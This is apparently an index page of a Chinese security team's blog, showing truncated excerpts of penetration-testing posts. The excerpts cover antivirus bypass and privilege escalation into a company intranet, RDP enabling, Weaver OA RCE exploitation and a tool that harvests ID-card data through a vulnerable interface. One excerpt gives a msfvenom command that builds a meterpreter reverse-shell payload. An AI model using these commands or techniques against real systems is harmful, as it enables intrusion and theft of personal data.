14x Security Team

展开菜单

部分安全行业从业人员自研开源扫描器合集

部分安全行业从业人员自研开源扫描器合集
部分安全行业从业人员自研开源扫描器合集fuzz工具收集https://github.com/ivanfratric/winaflhttps://github.com/attekett/NodeFuzzhttps://github.com/google/oss-fuzzhttp://blog.topsec.com.cn/ad_lab/alphafuzzer/http://llvm.org/docs/LibFuzzer.html子域名枚举https://github.com/li...

python七行代码写一个简单的目录扫描器

python七行代码写一个简单的目录扫描器
python七行代码写一个简单的目录扫描器import requestsimport sysimport osurl = sys.argv[1]with open("e:/Visual Studio Code/abc.txt","r") as f: #用以读方式打开e盘目录下的txt文件    for i in f.readlines():      &nb...

神器绕过360杀毒提权内网OA系统过程(一)

神器绕过360杀毒提权内网OA系统过程(一)
神器绕过360杀毒提权内网OA系统过程目标:某XX公司内网OA系统发现有360杀毒,wce传上去直接被杀,烂土豆potato也被杀掉,MSF的木马就更不用说了使用免杀神器提权成功,但是发现没有开启3389,又处于内网所以还需要进行3389开启配合cscript.exe进行On Error Resume Nextconst HKEY_LOCAL_MACHINE = &H80000002strComputer = "."Set StdOut = WSc...

身份证图像采集信息查询工具v1.0

身份证图像采集信息查询工具v1.0
身份证图像采集信息查询工具v1.0关于这个工具很早就想写一个,正好写一个接口查询的工具原理:访问接口,使用正则或者getld获取用户的内容使用io流读写用户图像漏洞调用存在漏洞的接口,进行遍历查询...

烂土豆提权内网遇到credssp加密数据库修正的问题

烂土豆提权内网遇到credssp加密数据库修正的问题
烂土豆提权内网遇到credssp加密数据库修正的问题烂土豆提权成功后,使用wce读到了管理员的密码,但是连接出现了credssp加密数据库修正经过测试,MSF也连接失败如果win10没有gpedit.msc就进行加载@echo offpushd "%~dp0"dir /b %systemroot%\Windows\servicing\Packages\Microsoft-Windows-GroupPolicy-ClientExtensions-Packag...

2020HVV护网漏洞利用总结

2020HVV护网漏洞利用总结
2020HVV护网漏洞利用总结1、 泛微OA Bsh 远程代码执行漏洞    漏洞简介2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁, 泛微e-cology OA系统的Java Beanshell接口可被未授权访问, 攻击者调用该Beanshell接口, 可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行, 漏洞等级严重.    影响组件泛微OA   ...

windows 2008 r2 meterpreter转发内网实例

windows 2008 r2 meterpreter转发内网实例
windows 2008 r2 meterpreter转发内网实例我们已经讲过了reDuh转发提权内网实例,今天带来一篇使用msf的meterpreter转发实例准备工具:frp内网穿透工具一台VPS linux主机,一台kali的系统,一台window的系统使用msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XX LPORT=2333 -f c生成一个shellcode,在Microsoft Visual C++进...

提权小试之oday getshell 内网提权windows 2008 r2过程

提权小试之oday getshell 内网提权windows 2008 r2过程
提权小试之oday getshell 内网提权windows 2008 r2过程本次用到自己写的工具,实现一键上传并getshell通过上传返回getshell即可进入webshell,发现开放很多端口445可以用于ms17010终端3389打开发现是内网环境补丁倒是打了不少,我们试试16032提权发现,直接溢出成功了一切看起来很顺利,接下来就是内网转发了内网转发这里使用reDuh或者msf内置的meterpreter转发服务器支持aspx直接上传,然后输入命令java --...